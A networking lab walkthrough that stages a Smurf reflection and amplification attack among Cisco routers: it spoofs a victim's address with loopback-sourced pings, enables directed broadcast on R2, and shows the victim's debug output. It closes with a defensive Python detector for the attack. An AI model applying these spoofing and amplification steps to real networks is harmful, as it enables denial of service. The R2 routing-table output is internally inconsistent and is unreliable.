SCOR Lab 1: Smurf Attack

Smurf Attack

In Lab 1: Smurf Attack, participants typically delve into the detection and mitigation of a Smurf attack, a type of Distributed Denial of Service (DDoS) attack. This Security Core (SCOR) lab focuses on providing hands-on experience in recognizing and mitigating the Smurf attack's impact on a network. Participants may use various security tools and techniques to identify the characteristics of a Smurf attack, analyze the network traffic, and implement countermeasures to protect against such malicious activities. The lab aims to enhance participants' skills in understanding DDoS threats, strengthening their abilities to secure and defend networks against disruptive attacks, and contributing to effective cybersecurity practices. Successful completion of SCOR Lab 1 equips participants with valuable insights and practical experience in mitigating Smurf attacks within a security context.

Lab:

LAB Topology

This lab was developed on IOS version 15.2(4). In the following diagram, R1 is the attacker; it forms an EIGRP neighborship with the rest of the organization's routers. Once the neighborship is up, the attacker sends ICMP echo requests with a spoofed source address, impersonating the victim R3.

Task 1: Initial Configuration

Step 1: Configure IP addresses on the R1, R2, R3, R4 and R5 routers.

R1#conf t
interface FastEthernet 0/0
ip address 10.0.1.1 255.255.255.0
no shut
interface loopback 1
ip address 10.0.3.3 255.255.255.255
exit

R2# conf t
interface FastEthernet 0/0
ip address 10.0.1.2 255.255.255.0
no shut
interface FastEthernet 1/0
ip address 10.0.2.2 255.255.255.0
no shut
interface FastEthernet 0/1
ip address 10.0.3.2 255.255.255.0
no shut

R3# conf t
interface FastEthernet 0/0
ip address 10.0.3.3 255.255.255.0
no shut

R4# conf t
interface FastEthernet 0/0
ip address 10.0.2.100 255.255.255.0
no shut

R5# conf t
interface FastEthernet 0/0
ip address 10.0.2.200 255.255.255.0
no shut

Step 2: Configure and Verify EIGRP on devices.

R1# conf t
router eigrp 100
network 10.0.1.0 255.255.255.0

R2# conf t
router eigrp 100
network 0.0.0.0

R3# conf t
router eigrp 100
network 0.0.0.0

R4# conf t
router eigrp 100
network 0.0.0.0

R5# conf t
router eigrp 100
network 0.0.0.0

Step 3: Once EIGRP is configured, verify the routing table of the routers.

R1#show ip route

10.0.0.0/8 is variably subnetted, 4 subnets, 2 masks
D    10.0.2.0/24 [90/284160] via 10.0.1.2, 00:00:19, FastEthernet0/0
D    10.0.3.0/24 [90/307200] via 10.0.1.2, 00:00:19, FastEthernet0/0
C    10.0.3.3/32 is directly connected, Loopback1
C    10.0.1.0/24 is directly connected, FastEthernet0/0

R2#show ip route
10.0.0.0/24 is subnetted, 3 subnets
C    10.0.1.0/24 is directly connected, FastEthernet0/0
D    10.0.2.0 [90/284160] via 10.0.3.2, 00:04:39, FastEthernet0/0
D    10.0.1.0 [90/307200] via 10.0.3.2, 00:04:39, FastEthernet0/0

Task 2: Perform Reflection Attack

From R1, spoof the IP address of R3 (10.0.3.3) and send ICMP echo requests to R4. R4 answers each request, and because the source was spoofed, the replies are delivered to R3 and show up on R3's console. The result is unwanted resource consumption on both R3 and R4.

Step 1: Let us start by enabling debug on the R3 router.

R3# debug ip icmp

Step 2: Now we spoof the identity of the victim (R3) from R1 (the attacker) and send ICMP echo requests to R4.

R1# ping 10.0.2.100 source loopback 1

Step 3: Checking the debug output on R3 shows echo replies arriving from R4 for requests R3 never sent; this is a reflection attack. With a single reflector it behaves like a DoS attack.

R3#
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3

Task 3: Perform Amplification Attack

By default, a router does not forward a directed broadcast packet; it drops it (no ip directed-broadcast has been the interface default since IOS 12.0). In our scenario, we simulate the attack by explicitly enabling directed broadcast on the router that receives the broadcast packet.

Step 1: Enable directed broadcast on R2's interface facing the 10.0.2.0/24 network so that it forwards the directed broadcast.

R2# conf t
interface FastEthernet 1/0
ip directed-broadcast

Step 2: From R1 (the attacker), send ICMP echo requests to 10.0.2.255 (the directed broadcast address) while spoofing the IP address of R3 (the victim).

R1# ping 10.0.2.255 source loopback 1

Step 3: Verify the debug output on the R3 router. The attacker sent one request to every host in the 10.0.2.0/24 network using the victim's IP address, and every device in that network replies to the victim, so each request is multiplied by the number of responders and more resources are exhausted on the victim. This kind of amplification attack is similar to a DDoS attack.

R3#
ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3

ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3

ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3

ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3

ICMP: echo reply received, source 10.0.1.2, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3
ICMP: echo reply received, source 10.0.2.200, destination 10.0.3.3
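The difference between Task 2 (one reflector) and Task 3 (every host on the broadcast subnet answering) can be detected directly from the victim's debug ip icmp lines: echo replies from hosts the router never pinged are unsolicited, and the number of distinct reflectors answering the same destination gives the amplification factor. The following detector is an added example, not part of the SCOR lab; the log lines are constructed to mirror R3's output above, and the set of hosts the router really pinged is assumed to be supplied by the operator.

```python
"""Classify Cisco 'debug ip icmp' echo-reply lines as clean, reflected or
amplified traffic.  Added example for this lab writeup, not part of the SCOR
lab itself; the log samples are constructed to match R3's debug output."""
import re
from collections import Counter, defaultdict

# Line format as shown in the lab's R3 console output (assumption: only the
# echo-reply lines matter, any other debug lines are ignored).
REPLY_RE = re.compile(
    r"ICMP: echo reply received, source (\S+), destination (\S+)")


def parse_replies(lines):
    """Return (source, destination) pairs for every echo-reply line."""
    return [m.groups() for m in map(REPLY_RE.search, lines) if m]


def analyse(lines, pinged):
    """pinged: hosts this router really sent echo requests to (empty for R3).

    A reply from a host we never pinged is unsolicited, so its request carried
    a spoofed source.  One unsolicited reflector means reflection; several
    distinct reflectors answering the same destination mean the request was
    delivered to a broadcast address, i.e. Smurf-style amplification."""
    pairs = parse_replies(lines)
    unsolicited = Counter(src for src, _ in pairs if src not in pinged)
    reflectors = defaultdict(set)
    for src, dst in pairs:
        if src not in pinged:
            reflectors[dst].add(src)
    fan_out = max((len(s) for s in reflectors.values()), default=0)
    if not unsolicited:
        verdict = "clean"
    elif fan_out == 1:
        verdict = "reflection"
    else:
        verdict = "amplification x%d" % fan_out
    return {"unsolicited": dict(unsolicited), "fan_out": fan_out,
            "verdict": verdict}


# Constructed samples mirroring the lab: Task 2 (R4 alone replies) and Task 3
# (directed broadcast to 10.0.2.255, three hosts answer each of 5 requests).
TASK2_LOG = ["ICMP: echo reply received, source 10.0.2.100, destination 10.0.3.3"] * 5
TASK3_LOG = [
    "ICMP: echo reply received, source %s, destination 10.0.3.3" % s
    for _ in range(5) for s in ("10.0.1.2", "10.0.2.100", "10.0.2.200")]

if __name__ == "__main__":
    print(analyse(TASK2_LOG, pinged=set()))
    print(analyse(TASK3_LOG, pinged=set()))
    print(analyse(TASK2_LOG, pinged={"10.0.2.100"}))  # R3 really pinged R4
```

Feeding the same lines with the destination host listed in pinged yields "clean", which is how a legitimate ping from R3 to R4 is told apart from a reflected one.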